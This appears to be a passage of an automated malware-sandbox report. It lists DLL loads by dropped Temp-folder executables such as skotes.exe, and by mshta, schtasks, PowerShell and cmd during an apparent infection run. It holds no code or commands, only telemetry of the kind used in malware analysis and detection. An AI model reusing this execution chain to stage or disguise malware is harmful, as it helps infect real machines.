Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Section loaded: kernel.appcore.dll
